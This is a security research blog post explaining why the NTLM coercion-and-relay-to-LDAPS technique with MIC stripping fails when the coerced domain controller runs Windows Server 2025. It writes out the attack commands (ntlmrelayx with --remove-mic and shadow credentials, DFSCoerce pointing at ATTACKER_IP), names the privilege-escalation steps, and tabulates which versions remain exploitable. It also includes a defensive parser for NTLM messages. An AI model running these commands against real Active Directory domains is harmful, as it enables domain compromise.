The article explains a subtle but impactful security change introduced in Windows Server 2025 Domain Controllers that silently disrupts a well-known NTLM relay attack technique used in Active Directory environments. Historically, attackers could combine coercion attacks with NTLM relay to LDAPS by exploiting environments where LmCompatibilityLevel allowed NTLMv1 with Extended Session Security (ESS). In this scenario, attackers could manipulate the NTLM handshake and strip the Message Integrity Code (MIC), enabling authentication relays across domain controllers. The author discovered that this attack chain no longer works when the target DC runs Windows Server 2025. Unlike previous mitigations that relied on policies or configuration changes, this protection is implemented directly in the authentication code inside msv1_0.dll. The change effectively blocks the legacy behavior required for generating NTLMv1 responses in this context, preventing the attacker from abusing the MIC-stripping technique. As a result, the traditional cross-DC coercion + NTLM relay to LDAPS attack path is effectively dead against Server 2025 domain controllers, marking an important hardening step in Microsoft’s gradual move away from NTLM toward more secure authentication mechanisms.
TL;DR
This post is super short, nevertheless:
The classic cross-DC coerce + relay to LDAPS technique, abusing a misconfigured LmCompatibilityLevel (0/1/2) to generate NTLMv1 + ESS and strip the MIC, is dead when the victim DC runs Windows Server 2025.
And it’s not just a policy change.
It’s hardcoded in msv1_0.dll.
DISCLAIMER
I’m not 100% sure nobody has already published or blogged about this specific finding. I did some research and couldn’t find anything covering this topic, but if someone has already documented this, kudos to them, and sorry for the duplication. I’m sharing it because I think it’s useful and I haven’t seen it written up this way anywhere.
THE CLASSIC ATTACK
If you’ve done Active Directory pentesting or red teaming in the last few years, you probably know this one by heart.
Scenario:
We have at least two domain controllers. One of them, DC2, has LmCompatibilityLevel misconfigured (< 3).
That gives us an opening.
We can run:
ntlmrelayx.py -t ldaps://DC1 -smb2support --shadow-credentials --remove-mic
Then coerce DC2 to authenticate to us:
DFSCoerce.py -u <user> -p <pass> -d <domain> DC2 ATTACKER_IP
DC2 is coerced into authenticating to our attacker machine.
An NTLMv1 + ESS AUTHENTICATE message hits our ntlmrelayx.
We strip the MIC using --remove-mic, relay it to DC1 over LDAPS, and modify sensitive attributes on DC2’s computer object:
- Write msDS-KeyCredentialLink (Shadow Credentials)
- Add RBCD
- Or any other relay-based privilege escalation
Game over.

This worked reliably when the coerced Domain Controller version was <= 2022.
It does not work when the coerced Domain Controller is 2025:

Let me explain, based on my analysis, why, at the code level.
WHAT CHANGED IN SERVER 2025
Diffing msv1_0.dll between Server 2022 and Server 2025 (thanks also to Claude) reveals an interesting change that kills this attack.
- Fixed level in NtLmGlobalLmProtocolSupported
In MspLm20GetChallengeResponse, the code that determines what type of authentication response to generate, Server 2025 added this:

This means that even with LmCompatibilityLevel set to 0, 1 or 2 in the registry on a 2025 DC, it still generates NTLMv2:

Note that in case of an NTLMv1 response, the size is fixed to 24.
What does this mean?
A Win2025 machine will never generate NTLMv1 as a client, regardless of the LmCompatibilityLevel configured in the registry.
Also notable: the default value of NtLmGlobalLmProtocolSupported changed from 3 in 2022 to 4 in 2025.
This hopefully explains why this relay attack stopped working in 2025 (at least starting from the 2024-09 Cumulative Update for Windows 11 Version 24H2 for arm64-based Systems (KB5043080)).
In Server 2022 the registry value was used directly.
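As an added illustration (not code from this post), here is a small Python parser that classifies a captured NTLM AUTHENTICATE_MESSAGE the way a defender auditing authentication to a DC would want: it reads the NtChallengeResponse length (24 bytes means NTLMv1, as noted above), the ESS negotiate flag, and whether the 16-byte MIC slot is present after the Version field. The builder exists only to construct test samples; account names, flag combinations and response bytes are constructed values, not real captures.

```python
import struct

# NegotiateFlags bits from MS-NLMP 2.2.2.5 (real values)
NEGOTIATE_UNICODE = 0x00000001
NEGOTIATE_EXTENDED_SESSIONSECURITY = 0x00080000  # "ESS" / NTLM2 session security
NEGOTIATE_VERSION = 0x02000000
FIXED_LEN, VERSION_LEN, MIC_LEN = 64, 8, 16      # AUTHENTICATE_MESSAGE header sizes


def build_authenticate(nt_response, user, domain, flags, with_mic):
    """Constructed sample AUTHENTICATE_MESSAGE for testing; no real credentials."""
    version = b""
    if flags & NEGOTIATE_VERSION or with_mic:      # MIC sits after the 8-byte Version slot
        version = b"\x0a\x00\x61\x4a\x00\x00\x00\x0f" if flags & NEGOTIATE_VERSION else b"\x00" * 8
    mic = b"\x11" * MIC_LEN if with_mic else b""
    payload = [b"\x00" * 24, nt_response, domain.encode("utf-16-le"),
               user.encode("utf-16-le"), b"", b""]  # LM, NT, Domain, User, Workstation, SessionKey
    off, hdr, body = FIXED_LEN + len(version) + len(mic), b"", b""
    for f in payload:
        hdr += struct.pack("<HHI", len(f), len(f), off)
        body, off = body + f, off + len(f)
    return b"NTLMSSP\x00" + struct.pack("<I", 3) + hdr + struct.pack("<I", flags) + version + mic + body


def classify_authenticate(msg):
    """Report NTLM version, ESS and MIC presence for one captured AUTHENTICATE_MESSAGE."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLM AUTHENTICATE_MESSAGE")
    fields = [struct.unpack_from("<HHI", msg, 12 + 8 * i) for i in range(6)]
    flags = struct.unpack_from("<I", msg, 60)[0]
    used = [off for ln, _, off in fields if ln]
    payload_start = min(used) if used else len(msg)
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "cp437"
    domain = msg[fields[2][2]:fields[2][2] + fields[2][0]].decode(enc)
    user = msg[fields[3][2]:fields[3][2] + fields[3][0]].decode(enc)
    nt_len = fields[1][0]
    # NTLMv1 NtChallengeResponse is always 24 bytes; NTLMv2 is a 16-byte HMAC plus a client blob
    version = "anonymous" if nt_len == 0 else "NTLMv1" if nt_len == 24 else "NTLMv2"
    return {
        "version": version,
        "ess": bool(flags & NEGOTIATE_EXTENDED_SESSIONSECURITY),
        "mic_present": payload_start >= FIXED_LEN + VERSION_LEN + MIC_LEN,
        "account": f"{domain}\\{user}",
    }


def is_unprotected_ntlmv1(info):
    """NTLMv1 without a MIC is exactly what a Server 2025 DC no longer emits; worth alerting on."""
    return info["version"] == "NTLMv1" and not info["mic_present"]
```

Feeding the classifier with AUTHENTICATE messages pulled from a capture of a DC's outbound authentication makes it easy to spot which DCs still emit NTLMv1 and therefore still need their LmCompatibilityLevel raised.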
THE SURVIVING ATTACK SURFACE
The table summarizes the exploitable attack surface based on the Server versions:
| DC Victim | DC Target | Victim LmCompatibilityLevel | LDAPS Channel Binding |
|---|---|---|---|
| Server version <= 2022 | Server version <= 2022 | 0, 1, 2 | NOT required |
| Server version <= 2022 | Server version 2025 | 0, 1, 2 | NOT required |
The --remove-mic technique with NTLMv1 + ESS still works against targets of all versions, as long as the coerced (victim) DC is Server 2022 or older.
But hey, we’re all abandoning NTLM very soon anyway.
At least that’s what Microsoft keeps telling us.
So who cares?
That’s all